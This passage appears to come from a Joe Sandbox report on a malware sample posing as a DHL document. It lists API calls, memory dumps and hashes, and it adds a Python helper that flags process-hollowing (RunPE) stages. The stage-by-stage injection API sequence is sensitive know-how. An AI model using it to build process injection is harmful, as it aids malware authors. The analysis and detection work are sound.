                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 1438897964-0
                                                                                    APIs
                                                                                      • Part of subcall function 007D571C: __FF_MSGBANNER.LIBCMT ref: 007D5733
                                                                                      • Part of subcall function 007D571C: __NMSG_WRITE.LIBCMT ref: 007D573A
                                                                                      • Part of subcall function 007D571C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,007D0DD3,?), ref: 007D575F
                                                                                    • std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                    • __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                      • Part of subcall function 007D859B: RaiseException.KERNEL32(?,?,?,00869E78,00000000,?,?,?,?,007D0E06,?,00869E78,?,00000001), ref: 007D85F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    APIs
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    • __lock_file.LIBCMT ref: 007D53EB
                                                                                      • Part of subcall function 007D6C11: __lock.LIBCMT ref: 007D6C34
                                                                                    • __fclose_nolock.LIBCMT ref: 007D53F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 210cc0f46d42345ae185daa763994a9f67db8347dcd8000f3f021a388c3fdc9a
                                                                                    • Instruction ID: dc093d77f21778f00e427206f6ae980e35f43c1db0a3dbd3961380482798f63d
                                                                                    • Opcode Fuzzy Hash: 210cc0f46d42345ae185daa763994a9f67db8347dcd8000f3f021a388c3fdc9a
                                                                                    • Instruction Fuzzy Hash: 03F09071900A04DBDB50AB65980A7AD7BB06F41378F25820BA464AB3C1CBBC99419B63
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 2438371351-0
                                                                                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction ID: 436ec315c218a0e06da86934b4f1148ac3f0f6a66b1c878542758aa6af36af38
                                                                                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                                                    • Instruction Fuzzy Hash: 8112DE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
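The three calls listed above for the function at 0149C093 (CreateProcessW, Wow64GetThreadContext with ContextFlags 0x00010007, then a 4-byte ReadProcessMemory) are the opening of the RunPE / process-hollowing sequence, and the report places them in the 0149A000 dump marked "based on PE: false", i.e. code executing from memory that is not backed by a loaded image, unlike the 007B0000 module. The Python below is an added triage helper, not Joe Sandbox code and not part of this report: it parses bullet lines in the report's "APIs" format, decodes the arguments that matter (CONTEXT flags, read size, Sleep interval) and lists which hollowing stages a function's call list covers. The sample input is copied from this page's entries (the function above and the Sleep call listed further down); the stage table, the API aliases in it and the reading of the 4-byte ReadProcessMemory as a PEB image-base fetch are the example's own assumptions, not statements from the report.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Line shapes that appear in the report:
#   • CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
#   • Part of subcall function 007B4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007B4BEF
#   • __lock_file.LIBCMT ref: 007D48A6
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Textbook RunPE / process-hollowing stages with the APIs usually used for each.
# This table is the example's own; the report does not define it.
HOLLOWING_STAGES = [
    ("spawn target", {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"}),
    ("read thread context", {"GetThreadContext", "Wow64GetThreadContext"}),
    ("read remote memory", {"ReadProcessMemory", "NtReadVirtualMemory"}),
    ("unmap original image", {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("allocate in target", {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write payload", {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("redirect entry point", {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume target", {"ResumeThread", "NtResumeThread"}),
]

# x86 CONTEXT flag bits from winnt.h; CONTEXT_FULL == CONTEXT_i386 | 0x7 == 0x00010007.
CONTEXT_I386 = 0x00010000
CONTEXT_BITS = {0x1: "CONTROL", 0x2: "INTEGER", 0x4: "SEGMENTS",
                0x8: "FLOATING_POINT", 0x10: "DEBUG_REGISTERS", 0x20: "EXTENDED_REGISTERS"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # as printed; '?' means Joe Sandbox could not resolve the value
    ref: int                   # call-site address
    subcall_of: Optional[int]  # set for 'Part of subcall function' entries


def hex_arg(arg: str) -> Optional[int]:
    """Resolved arguments are printed as hex, unresolved ones as '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]+", arg) else None


def parse_api_lines(lines: Iterable[str]) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in lines:
        m = API_LINE.match(line)
        if not m:  # headers such as 'APIs' or 'Memory Dump Source' are skipped
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_context_flags(value: int) -> str:
    names = [n for bit, n in CONTEXT_BITS.items() if value & bit]
    if value == CONTEXT_I386 | 0x7:
        return "CONTEXT_FULL (" + "|".join(names) + ")"
    return "|".join(names) or f"0x{value:08X}"


def annotate(call: ApiCall) -> str:
    """One triage line per call, decoding the arguments that matter for injection analysis."""
    note = f"{call.ref:08X} {call.name}.{call.module}"
    if call.name in ("GetThreadContext", "Wow64GetThreadContext") and len(call.args) >= 2:
        flags = hex_arg(call.args[1])
        if flags is not None:
            note += f"  ContextFlags={decode_context_flags(flags)}"
    elif call.name == "ReadProcessMemory" and len(call.args) >= 4:
        size = hex_arg(call.args[3])
        if size is not None:
            note += f"  nSize={size}"
            if size == 4:
                # A pointer-sized read right after GetThreadContext is how RunPE usually
                # fetches the child's image base (PEB+8, PEB from Ebx). Assumption, not
                # something the report states.
                note += "  (pointer-sized read, consistent with PEB.ImageBaseAddress)"
    elif call.name == "Sleep" and call.args:
        ms = hex_arg(call.args[0])
        if ms is not None:
            note += f"  dwMilliseconds={ms}"
    return note


def hollowing_stages(calls: Iterable[ApiCall]) -> List[str]:
    """Which RunPE stages the listed calls cover, in canonical order."""
    seen = {c.name for c in calls}
    return [stage for stage, names in HOLLOWING_STAGES if seen & names]


# Sample input copied from the report's 'APIs' entries on this page (the function at
# 0149C093 and the Sleep call at 0149C8E9), with the section headers left in.
REPORT_LINES = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0149C093
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0149C129
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0149C14B
Memory Dump Source
APIs
• Sleep.KERNELBASE(000001F4), ref: 0149C8E9
""".splitlines()


if __name__ == "__main__":
    parsed = parse_api_lines(REPORT_LINES)
    for c in parsed:
        print(annotate(c))
    print("hollowing stages present:", hollowing_stages(parsed))
```

Only the first three stages of the sequence appear under this function; the CreateProcessW line shows just two resolved arguments, so CREATE_SUSPENDED cannot be confirmed from it, and the write/set-context/resume stages would have to be found in other functions of the same dump before calling it hollowing on the API evidence alone.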
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 1ae2918f94a5901b7464c9bcd607a30ae563cd7d6a68ce4e8a0741a1e4216bf2
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: A031C070A101059BC718DF59C484AA9FBB6FB59300F64A6A6E80ACB351DA35EDC1DBE0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: ffe16420d12b33bfe6feebc9a63eae478b8631235425838851f1513cf4f8c3cc
                                                                                    • Instruction ID: 1e09f2c9e32aad498ba927e0f115365526c1fad8b7b4d5083492ad91038209f8
                                                                                    • Opcode Fuzzy Hash: ffe16420d12b33bfe6feebc9a63eae478b8631235425838851f1513cf4f8c3cc
                                                                                    • Instruction Fuzzy Hash: 32412774604341DFDB24DF24C448B6ABBE0BF49314F0988ACE9998B762C379E845CF92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 25bcc02bd89e9a4a610af589ad8e3e5c34fe3acebb2ca2f2933fef76095e5b4b
                                                                                    • Instruction ID: ff929643694c26a9e0e3c89f95b206d9ed29e8246a923a97107860b31375c4d4
                                                                                    • Opcode Fuzzy Hash: 25bcc02bd89e9a4a610af589ad8e3e5c34fe3acebb2ca2f2933fef76095e5b4b
                                                                                    • Instruction Fuzzy Hash: 0F216AB2604A08EBDB148F26EC417AE7BB8FF58350F31886EE486C51A0EB74C1D0DB55
                                                                                    APIs
                                                                                      • Part of subcall function 007B4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 007B4BEF
                                                                                      • Part of subcall function 007D525B: __wfsopen.LIBCMT ref: 007D5266
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E0F
                                                                                      • Part of subcall function 007B4B6A: FreeLibrary.KERNEL32(00000000), ref: 007B4BA4
                                                                                      • Part of subcall function 007B4C70: _memmove.LIBCMT ref: 007B4CBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1396898556-0
                                                                                    • Opcode ID: 6114fef936412b7548d0fced036c3cf4083d1a7d70ddb731c4cdd56019a72b91
                                                                                    • Instruction ID: f31e4df7cf28180df2c1b929e46c48845a83cba2e9dca34481e40bbae69a0afe
                                                                                    • Opcode Fuzzy Hash: 6114fef936412b7548d0fced036c3cf4083d1a7d70ddb731c4cdd56019a72b91
                                                                                    • Instruction Fuzzy Hash: DE119131600205EBCF25AF75CC1AFEE77A9AF84750F108829F641E7183DA799A059B91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 8f051f19701f9961569c30331217e248724423608df507907a8e6b312903c34c
                                                                                    • Instruction ID: 99ea0a8a736c606af39065e9d8debdd38521259c6321b2ac11fd96b78a8365da
                                                                                    • Opcode Fuzzy Hash: 8f051f19701f9961569c30331217e248724423608df507907a8e6b312903c34c
                                                                                    • Instruction Fuzzy Hash: FB21F574A08341DFCB14EF64C444B5ABBE1BF88314F05896CE99A57722D739E809DB92
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                                                                    • Instruction ID: ebec1ab9910709012097c113025e00889fb1758d1782b4b26dd28cd46af8f950
                                                                                    • Opcode Fuzzy Hash: 117d4443c8501ce4c8c95a31332936277f53f3a231eaf518ec7fad8777a82f8d
                                                                                    • Instruction Fuzzy Hash: 1101D672204701AED3259F78C806FA7BBB49F44760F10852FF61ACA291EA79E840C7A0
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 007D48A6
                                                                                      • Part of subcall function 007D8B28: __getptd_noexit.LIBCMT ref: 007D8B28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
                                                                                    • Opcode ID: 2bead88ff7598ef3d3cb7af5aec96b2a6a1b9f78a20ce6fe7b513d5f8c7c251e
                                                                                    • Instruction ID: 14b012fd431783a8ea230b180f36a1d3ec81435b5158da09fcda95f42f687717
                                                                                    • Opcode Fuzzy Hash: 2bead88ff7598ef3d3cb7af5aec96b2a6a1b9f78a20ce6fe7b513d5f8c7c251e
                                                                                    • Instruction Fuzzy Hash: 74F0CD71900689EBDF51AFB4CC0A7AE37B1AF00365F158416F424AA3D1CBBC9A51EB52
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4E7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 724f8a4de8320525788851a235c6f0dae256fda4cf603dc5b790057c6595e265
                                                                                    • Instruction ID: e9883066a63cb332a26b6219fdb6bc2331a2108f806f49518ab1aae8b3333ab9
                                                                                    • Opcode Fuzzy Hash: 724f8a4de8320525788851a235c6f0dae256fda4cf603dc5b790057c6595e265
                                                                                    • Instruction Fuzzy Hash: 07F03971501711DFCB349F64E494996BBF1BF543293208A3EE2D682622C77AE840DF40
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D07B0
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2514874351-0
                                                                                    • Opcode ID: 7e181acf071c43428eb98ac723585738eef8ed8ff80981e543a7ee0a30313194
                                                                                    • Instruction ID: e61a610462582a240660a9c1afe69cabc4239cd2e4355aa4f95f4c69969c40f1
                                                                                    • Opcode Fuzzy Hash: 7e181acf071c43428eb98ac723585738eef8ed8ff80981e543a7ee0a30313194
                                                                                    • Instruction Fuzzy Hash: B7E0867690512897C72096699C0AFEA779DDFC86A0F0441B5FD08D7245D964AC8086D0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction ID: d1b56c594455d06f977ee9e2de8b93d16e587ca14cdb23e5ec5bed9ead0cba8a
                                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                    • Instruction Fuzzy Hash: D3B092B644020CB7CE012A82EC02A493B29AB41764F408021FB0C18262E677A6689A89
                                                                                    APIs
                                                                                    • Sleep.KERNELBASE(000001F4), ref: 0149C8E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053365471.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_149a000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction ID: 6e8aa13bd4ef82c46b85ae22dabafe3be87a32b524e0ff92c1068f06b0d9c01d
                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                    • Instruction Fuzzy Hash: A0E0E67494010DDFDB00DFB4D6496AD7FB4EF04301F100161FD01D2280D6309D608A72
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0083CB37
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CB95
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083CBD6
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083CC00
                                                                                    • SendMessageW.USER32 ref: 0083CC29
                                                                                    • _wcsncpy.LIBCMT ref: 0083CC95
                                                                                    • GetKeyState.USER32(00000011), ref: 0083CCB6
                                                                                    • GetKeyState.USER32(00000009), ref: 0083CCC3
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CCD9
                                                                                    • GetKeyState.USER32(00000010), ref: 0083CCE3
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083CD0C
                                                                                    • SendMessageW.USER32 ref: 0083CD33
                                                                                    • SendMessageW.USER32(?,00001030,?,0083B348), ref: 0083CE37
                                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0083CE4D
                                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0083CE60
                                                                                    • SetCapture.USER32(?), ref: 0083CE69
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083CECE
                                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0083CEDB
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0083CEF5
                                                                                    • ReleaseCapture.USER32 ref: 0083CF00
                                                                                    • GetCursorPos.USER32(?), ref: 0083CF3A
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083CF47
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083CFA3
                                                                                    • SendMessageW.USER32 ref: 0083CFD1
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D00E
                                                                                    • SendMessageW.USER32 ref: 0083D03D
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0083D05E
                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0083D06D
                                                                                    • GetCursorPos.USER32(?), ref: 0083D08D
                                                                                    • ScreenToClient.USER32(?,?), ref: 0083D09A
                                                                                    • GetParent.USER32(?), ref: 0083D0BA
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083D123
                                                                                    • SendMessageW.USER32 ref: 0083D154
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083D1B2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0083D1E2
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D20C
                                                                                    • SendMessageW.USER32 ref: 0083D22F
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083D281
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0083D2B5
                                                                                      • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083D351
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
